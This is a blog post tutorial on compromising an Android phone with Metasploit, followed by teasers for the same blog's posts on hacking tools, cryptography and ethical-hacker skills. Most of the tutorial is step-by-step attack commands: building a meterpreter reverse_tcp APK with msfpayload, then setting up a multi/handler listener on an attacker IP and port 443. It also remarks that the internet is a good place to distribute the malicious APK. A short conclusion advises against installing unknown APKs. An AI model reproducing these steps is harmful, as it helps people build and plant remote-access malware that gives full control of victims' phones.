Skip to main content

Hacking Android Smartphone using Metasploit

Nowadays mobile users are increasing day by day, the security threat is also increasing together with the growth of its users. Our tutorial for today is how to Hacking Android Smartphone Tutorial using Metasploit. Why we choose android phone for this tutorial? simply because lately android phone growing very fast worldwide. Here in China you can get android phone for only US$ 30 it's one of the reason why android growing fast.
What is android? according to wikipedia:
Android is an operating system based on the Linux kernel, and designed primarily for touchscreen mobile devices such as smartphones and tablet computers. Initially developed by Android, Inc., which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with the founding of the Open Handset Alliance: a consortium of hardware, software, and telecommunication companies devoted to advancing open standards for mobile devices.
and what is APK? according to wikipedia:
Android application package file (APK) is the file format used to distribute and install application software and middleware onto Google's Android operating system; very similar to an MSI package in Windows or a Deb package in Debian-based operating systems like Ubuntu.
Here is some initial information for this tutorial:
Attacker IP address: 192.168.8.94
Attacker port to receive connection: 443
Requirements:
1. Metasploit framework (we use Kali Linux 1.0.6 in this tutorial)
2. Android smartphone (we use HTC One android 4.4 KitKat)
Step by Step Hacking Android Smartphone Tutorial using Metasploit:
1. Open terminal (CTRL + ALT + T) view tutorial how to create linux keyboard shortcut.
2. We will utilize Metasploit payload framework to create exploit for this tutorial.
msfpayload android/meterpreter/reverse_tcp LHOST= LPORT=
As described above that attacker IP address is 192.168.8.94, below is our screenshot when executed the command
3. Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine, attacker needs to set up the handler to handle incoming connections to the port already specified above. Type msfconsole to go to Metasploit console.
Info:
use exploit/multi/handler –> we will use Metasploit handler
set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2
4. The next step we need to configure the switch for the Metasploit payload we already specified in step 3.
Info:
set lhost 192.168.8.94 –> attacker IP address
set lport 443 –> port to listen the reverse connection
exploit –> start to listen incoming connection
5. Attacker already have the APK's file and now he will start distribute it (I don't need to describe how to distribute this file, internet is the good place for distribution  ).


6. Short stories the victim (me myself) download the malicious APK's file and install it. After victim open the application, attacker Metasploit console get something like this:
7. It's mean that attacker already inside the victim android smartphone and he can do everything with victim phone.
Conclusion:
1. Don't install APK's from the unknown source.
2. If you really want to install APK's from unknown source, make sure you can view, read and examine the source code. The picture below is the source code of our malicious APK's in this tutorial.

Comments

Post a Comment

Popular posts from this blog

Top 20 Tools for hacking 2018

What are Hacking Tools? Hacking Tools are computer programs and scripts that help you find and exploit weaknesses in computer systems, web applications, servers and networks. There is a variety of such tools available on the market. Some of them are open source while others are commercial solution. In this list we highlight the top 20 tools for Ethical Hacking of web applications, servers and networks 1)  Netsparker Netsparker  is an easy to use web application security scanner that can automatically find SQL Injection, XSS and other vulnerabilities in your web applications and web services. It is available as on-premises and SAAS solution. Features Dead accurate vulnerability detection with the unique Proof-Based Scanning Technology. Minimal configuration required. Scanner automatically detects URL rewrite rules, custom 404 error pages. REST API for seamless integration with the SDLC, bug tracking systems etc. Fully scalable s...
Post a Comment
Read more

crypthography and network security

Cryptography, which translates as "secret writing," refers to the science of concealing the meaning of data so only specified parties understand a transmission's contents. Cryptography has existed for thousands of years; for most of history, however, the users of cryptography were associated with a government or organized group and were working to conceal secret messages from enemies. These days, millions upon millions of secure, encoded transmissions happen online each day -- and cryptographic standards are used to protect banking data, health information, and much more. Without cryptography, e-commerce as we know it would be impossible. Since online security threats evolve so quickly, there are dozens of different schools of thought on how best to use encryption to enhance network security -- not just for governments, but for businesses and end users, too. Classical Encryption Techniques Classical Encryption Techniques Explained at Purdue University (PDF) : These...
Post a Comment
Read more

SKILLS REQUIRED BECOME A ETHICAL HACKER

What is a programming language? A programming language is a language that is used to develop computer programs. The programs developed can range from operating systems; data based applications through to networking solutions.   Why should you learn how to program? Hackers are the problem solver and tool builders, learning how to program will help you implement solutions to problems. It also differentiates you from script kiddies. Writing programs as a hacker will help you to automate many tasks which would usually take lots of time to complete. Writing programs can also help you identify and exploit programming errors in applications that you will be targeting. You don’t have to reinvent the wheel all the time, and there are a number of open source programs that are readily usable. You can  customize the already existing applications and add your methods to suit your needs . What languages should I learn? The answer to this question  depends on your ta...
2 comments
Read more